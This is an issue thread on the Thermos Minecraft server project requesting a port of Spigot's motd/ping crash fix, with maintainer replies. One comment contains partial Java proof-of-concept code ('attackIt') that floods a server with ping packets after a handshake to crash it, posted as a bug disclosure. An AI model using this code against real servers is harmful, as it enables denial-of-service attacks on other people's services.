### ISSUE TITLE
Please port spigot's motd/ping patch

### ISSUE THREAD

**Issue by caoli5288** [CyberdyneCC/Thermos#440]
Please port spigot's motd/ping patch. This is a bug can crash server very easily.
See https://hub.spigotmc.org/stash/projects/SPIGOT/repos/craftbukkit/commits/0cf233dd6d9457b43201a03155242e43ff401461
and
https://hub.spigotmc.org/jira/browse/SPIGOT-527

**Comment by Robotia** [comment]
Please make a pull request for this.

**Comment by caoli5288** [comment]
@Robotia I'm sorry I don't known howto do it. I'm a new man in modded server world. :-)

**Comment by caoli5288** [comment]
@Robotia Spigot patch into the vanilla's server. Can thermos do in this way?

**Comment by spannerman79** [comment]
As already stated by @Robotia 

> Please make a pull request for this.

@caoli5288 very simple to understand that statement - doesn't give you licence to constantly comment once that statement is made.

**Comment by Time6628** [comment]
I believe this is already implemented as the patch is for 1.7.2. Not sure though.

**Comment by caoli5288** [comment]
@Time6628 It patched while spigot-1.8.3

**Comment by caoli5288** [comment]
Do you think this is not a critical issue? I can crash down any server in 10s without any fix patch. Some plugin based on packet filter can prevent from crash immediately but will led server on very heavy load and crash some minutes after. Sample code here. Fix it please.
```
    private final static byte[] HANDSHAKE = {
            15, 0, 47, 9, 108, 111, 99, 97, 108, 104, 111, 115, 116, 99, -35, 1
    };
    private final static byte[] PING = {
            1, 0
    };

    public static void attackIt(String host, int port) {
        try (Socket socket = new Socket(host, port)) {
            DataOutputStream out = new DataOutputStream(socket.getOutputStream());
            InputStream in = socket.getInputStream();
            out.write(HANDSHAKE);
            out.flush();
            for (;;) {
                out.write(PING);
                out.flush();
                // And then skip all data in inout stream. Hide some line for secure reason.
            }
        } catch (IOException ignore) {
        }
    }
```

**Comment by Time6628** [comment]
Will be fixed in build 58.

**Comment by iKaneki-Ken** [comment]
And sure enough as @spannerman79 said, it did break something. So @caoli5288, next time before requesting an existing patch to be implemented, please fork Thermos and merge it in yourself and test it in multiple server setups to make sure it doesn't break anything. Then submit a pull request.
